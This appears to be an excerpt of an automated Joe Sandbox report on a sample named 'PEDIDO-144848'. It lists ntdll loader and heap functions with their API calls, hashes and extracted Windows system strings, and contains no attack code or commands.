                                                        • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                        • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
                                                        • CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                        • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                        • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                        • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9

                                                        Execution Graph

                                                        Execution Coverage:0%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:1
                                                        Total number of Limit Nodes:0
                                                        execution_graph 67965 36c42b90 LdrInitializeThunk

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4 36c434e0-36c434ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6037e84b701946f3c0cae306c4fb98e84e7d3d471e84182cc1c0cd3f90fcef9d
                                                        • Instruction ID: 957b90b829d2e66ac347d493b85fe159e2a3e6dbe9611f1dd85680f8dd13e19c
                                                        • Opcode Fuzzy Hash: 6037e84b701946f3c0cae306c4fb98e84e7d3d471e84182cc1c0cd3f90fcef9d
                                                        • Instruction Fuzzy Hash: 2A90023160611812D50061594A14706100597D0205F62C817A241452CEC7A5895575B7

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3 36c42eb0-36c42ebc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1fd42e3c7f6f46d45b33251249b9dbc87c67b56e610f29d016b0d289e89ce5b6
                                                        • Instruction ID: e446d10064a62adb72d2b26f5805ad527df38aff01714866c5d52e588443aba0
                                                        • Opcode Fuzzy Hash: 1fd42e3c7f6f46d45b33251249b9dbc87c67b56e610f29d016b0d289e89ce5b6
                                                        • Instruction Fuzzy Hash: EA90023120241812D50061594D1470B000597D0306F52C417A3154519EC63588557576

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2 36c42d10-36c42d1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 20aa3e387d39783cd2203680ab484b17a56d7539536ffb4c9fe8567ea9815446
                                                        • Instruction ID: 496fdd80316866de3d33727ac000123d9019385eae62491d62ab0926edb3b76c
                                                        • Opcode Fuzzy Hash: 20aa3e387d39783cd2203680ab484b17a56d7539536ffb4c9fe8567ea9815446
                                                        • Instruction Fuzzy Hash: 1290023120201823D51161594A04707000997D0245F92C817A241451CED6668956B136

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1 36c42bc0-36c42bcc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7a70fd56917c660d4bb0ae141a28d613d7cffefa0f0f9a05c7666a9b3ad2a7f5
                                                        • Instruction ID: c76e9d27abd06f73fbb37016137e52dcfc59cc7daa9b94461d4b09557c0d5a70
                                                        • Opcode Fuzzy Hash: 7a70fd56917c660d4bb0ae141a28d613d7cffefa0f0f9a05c7666a9b3ad2a7f5
                                                        • Instruction Fuzzy Hash: FB90023120201812D50065995908646000597E0305F52D417A7014519FC67588957136

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 36c42b90-36c42b9c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a4d0e5c8a25f04766b56a016271bc6578ea984660dbf9db6bd3fb301c5f703d9
                                                        • Instruction ID: 94a6f9805838d01d44a26d9f58faefc49904e0a279e0715e3113a669e6efa12d
                                                        • Opcode Fuzzy Hash: a4d0e5c8a25f04766b56a016271bc6578ea984660dbf9db6bd3fb301c5f703d9
                                                        • Instruction Fuzzy Hash: EF90023120209C12D5106159890474A000597D0305F56C817A641461CEC6A588957136

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $ $0
                                                        • API String ID: 3446177414-3352262554
                                                        • Opcode ID: 1b24c6a18e2b4960dcc1c0f491ed4a5b88ceb74090b4ce14c7edb997fcd3dd01
                                                        • Instruction ID: 3173bb00fee36f3612945aee87f7e2f511f24fcbd7e069fce1568a66a260ef3c
                                                        • Opcode Fuzzy Hash: 1b24c6a18e2b4960dcc1c0f491ed4a5b88ceb74090b4ce14c7edb997fcd3dd01
                                                        • Instruction Fuzzy Hash: 2B32F1B5A183828FE350CF69C885B9AFBE5BB88344F00492EF599C7350D774E948CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        • Address of the debug info found in the active list., xrefs: 36C752B9, 36C75305
                                                        • corrupted critical section, xrefs: 36C752CD
                                                        • Critical section address., xrefs: 36C7530D
                                                        • double initialized or corrupted critical section, xrefs: 36C75313
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C752D9
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C752ED
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 36C7534E
                                                        • Thread identifier, xrefs: 36C75345
                                                        • undeleted critical section in freed memory, xrefs: 36C75236
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 36C75215, 36C752A1, 36C75324
                                                        • Invalid debug info address of this critical section, xrefs: 36C752C1
                                                        • 8, xrefs: 36C750EE
                                                        • Critical section address, xrefs: 36C75230, 36C752C7, 36C7533F
                                                        • Critical section debug info address, xrefs: 36C7522A, 36C75339
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: c8ca0003d97ab1c760901c3030d2264d82f774d3572278417de6075e947d3e66
                                                        • Instruction ID: e30ee9957983358b58d870b3e57dd4264b2bc054d92bf4302899d0dc8a1ec5b6
                                                        • Opcode Fuzzy Hash: c8ca0003d97ab1c760901c3030d2264d82f774d3572278417de6075e947d3e66
                                                        • Instruction Fuzzy Hash: AE8159B1901758AFEB10CF95C940B9EBBB9FF08714F60415AF904BB281CB79A945CFA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 3446177414-1700792311
                                                        • Opcode ID: 34e12e700b0e8df7105fd6a98de207af69e232c3ebbfa97addcd496cc5e61528
                                                        • Instruction ID: 121198077691ff71f6ddaf7362e534fbed1c7033057263ebe18b8d244967a577
                                                        • Opcode Fuzzy Hash: 34e12e700b0e8df7105fd6a98de207af69e232c3ebbfa97addcd496cc5e61528
                                                        • Instruction Fuzzy Hash: ACD1D035A18685DFDB01CFA5C844AAABBF2FF49314F04809DE544AF262CB36D949CF61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        • Opcode ID: ee85eb0ea31f6851d2315bd5e82a12af5549b981b3c5009797f3c2d3b048fecd
                                                        • Instruction ID: 181f387c468115839162532aaa770f9d8e61d79988aad5699e931233c437c8a0
                                                        • Opcode Fuzzy Hash: ee85eb0ea31f6851d2315bd5e82a12af5549b981b3c5009797f3c2d3b048fecd
                                                        • Instruction Fuzzy Hash: 6C519EB59053129BD325CF55CC44A9BB7E8FF84290F50492EFA58C7240EB30D644CBD2
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                        • API String ID: 3446177414-1745908468
                                                        • Opcode ID: 8e0c1ef38df8e3ec8763fc697f791817103ed3ad016fae41d87061a9e4756741
                                                        • Instruction ID: 9bcb7d681cd2e30baf747026008952d998436d67917a3538fb5050e0e5373ed0
                                                        • Opcode Fuzzy Hash: 8e0c1ef38df8e3ec8763fc697f791817103ed3ad016fae41d87061a9e4756741
                                                        • Instruction Fuzzy Hash: 289100799057869FDB01CFA9C840AADBBF2FF09314F14845EE590AB262CB36D941CF61
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 36BF651C
                                                          • Part of subcall function 36BF6565: RtlDebugPrintTimes.NTDLL ref: 36BF6614
                                                          • Part of subcall function 36BF6565: RtlDebugPrintTimes.NTDLL ref: 36BF665F
                                                        Strings
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36C597B9
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C597A0, 36C597C9
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36C5977C
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36C59790
                                                        • LdrpInitShimEngine, xrefs: 36C59783, 36C59796, 36C597BF
                                                        • apphelp.dll, xrefs: 36BF6446
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-204845295
                                                        • Opcode ID: d4aaf8060f3a4ae1dc4ae89b3092f409b44331f7e2267dc8aa3586d2185aebdc
                                                        • Instruction ID: b5faf67a68e293a5dc7779da70316c2b099a70cffb6343fe7e22c517034bfdc7
                                                        • Opcode Fuzzy Hash: d4aaf8060f3a4ae1dc4ae89b3092f409b44331f7e2267dc8aa3586d2185aebdc
                                                        • Instruction Fuzzy Hash: 0051C0716087449FE310CF21CD50E5ABBE5EB84684F41095EFA94AB2A1EB31D904CF97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                        • API String ID: 0-3532704233
                                                        • Opcode ID: e76cbb7bbf67e723263c69bc9790be1efd43f87824b27a4d56c4e69f64040d82
                                                        • Instruction ID: 70f8deb3cda56a238099c65e6cb31ad149453b63e0eff33725e859c3709f7d8e
                                                        • Opcode Fuzzy Hash: e76cbb7bbf67e723263c69bc9790be1efd43f87824b27a4d56c4e69f64040d82
                                                        • Instruction Fuzzy Hash: A1B19EB59183519FD711CF69C840A4FBBE8EB84798F41492EFA84DB220DB71D908CF96
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 36C2D879
                                                          • Part of subcall function 36C04779: RtlDebugPrintTimes.NTDLL ref: 36C04817
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1975516107
                                                        • Opcode ID: be128f62ace6e35472853f21741339925b95038e4f6c05306643dc49da0ec5f2
                                                        • Instruction ID: a76b2af785d776c48e918c920554a7bcaed0d4878823da17da2621367b5f2c06
                                                        • Opcode Fuzzy Hash: be128f62ace6e35472853f21741339925b95038e4f6c05306643dc49da0ec5f2
                                                        • Instruction Fuzzy Hash: 0D51D075E047859FEB04CFA5C9A478DBBB2FF54708F64405EDA00AB281DB74A982CBC1
                                                        Strings
                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36BFD06F
                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36BFD202
                                                        • @, xrefs: 36BFD09D
                                                        • @, xrefs: 36BFD2B3
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36BFD263
                                                        • @, xrefs: 36BFD24F
                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36BFD0E6
                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 36BFD136
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                        • API String ID: 0-1356375266
                                                        • Opcode ID: 762caeb5e1c021b57097ae1e3019e5b399c8fb6d0508f2ec00ee4dc4ee372a76
                                                        • Instruction ID: 8ef1bc22190d2afe096d7944a19f4c133eda822a7b1a02ce1890729f17874e51
                                                        • Opcode Fuzzy Hash: 762caeb5e1c021b57097ae1e3019e5b399c8fb6d0508f2ec00ee4dc4ee372a76
                                                        • Instruction Fuzzy Hash: 20A17DB18187559FE321CF61C840B5BBBE8AF84755F40492EFA889A250DB75D90CCF93
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                        • API String ID: 0-2224505338
                                                        • Opcode ID: 005b87e5c9f17a1634fad7e0ff800ca9eef321bf29bfd68a720b51868a8f6dc1
                                                        • Instruction ID: 5fc861340ff4865336b9b0f32a89da8bb9d0fd637f21c4959b9336bf02a9ea95
                                                        • Opcode Fuzzy Hash: 005b87e5c9f17a1634fad7e0ff800ca9eef321bf29bfd68a720b51868a8f6dc1
                                                        • Instruction Fuzzy Hash: 7A51E036525746EFE701CFA5C884E5ABBB4EF04768F10849AF411DF222CA3AD944CF51
                                                        Strings
                                                        • VerifierDebug, xrefs: 36C88925
                                                        • HandleTraces, xrefs: 36C8890F
                                                        • VerifierDlls, xrefs: 36C8893D
                                                        • AVRF: -*- final list of providers -*- , xrefs: 36C8880F
                                                        • VerifierFlags, xrefs: 36C888D0
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 36C886BD
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 36C886E7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        • Opcode ID: ea1073e9fb43cc60949e412f5d83b3883622bf7f76c96a653c97e1dd35ff0f1f
                                                        • Instruction ID: 07fb63c33954d91df196807d0acbd4bca206ce35ea851bf18fb4a0b437b261bf
                                                        • Opcode Fuzzy Hash: ea1073e9fb43cc60949e412f5d83b3883622bf7f76c96a653c97e1dd35ff0f1f
                                                        • Instruction Fuzzy Hash: F3910271A06B61AFE721CF698C80B1ABBA5FF44718F850959FA40AF751C731D805CBA2
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C6A7AF
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36C6A79F
                                                        • LdrpDynamicShimModule, xrefs: 36C6A7A5
                                                        • apphelp.dll, xrefs: 36C22382
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: a080f60acb03a37c616b1751bdbde5393b75f241787f317824547359cede501a
                                                        • Instruction ID: 0ddb7b25247a0577367615778a56bb1e98eadc6146076ffd688b326420b02be4
                                                        • Opcode Fuzzy Hash: a080f60acb03a37c616b1751bdbde5393b75f241787f317824547359cede501a
                                                        • Instruction Fuzzy Hash: D8310776E00280AFEB109F5AC8C4A5977B6FB84748F29005EEA05BB351DBB49942CB94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                        • API String ID: 0-122214566
                                                        • Opcode ID: 614ca1270c8df2c6b11f54ea697235242b988d04fab9ceb9b4a7fd97a8fbabcd
                                                        • Instruction ID: 14d0a3ae8e128e87335b4b8956cddfbc442deaec86d963e2a1b662e8c91c5c18
                                                        • Opcode Fuzzy Hash: 614ca1270c8df2c6b11f54ea697235242b988d04fab9ceb9b4a7fd97a8fbabcd
                                                        • Instruction Fuzzy Hash: BCC13674E017159BEB048B66CC94BBEBBB1AF45308F644069E801EB390EB74D849DBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: 2a82597d2fc80e4243617d6cb9eb38289aff6110b12f538251be88551d59d6e3
                                                        • Instruction ID: 7b84c389cf2a4495cc076de0e7d95a291116832cb8c7b29d0630c09bdac8a70e
                                                        • Opcode Fuzzy Hash: 2a82597d2fc80e4243617d6cb9eb38289aff6110b12f538251be88551d59d6e3
                                                        • Instruction Fuzzy Hash: 8E911370E067A4EFE755CB22CD44B997BA2EF40764F20406DE644AF381CB789852CBE5
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 36C3C5E4
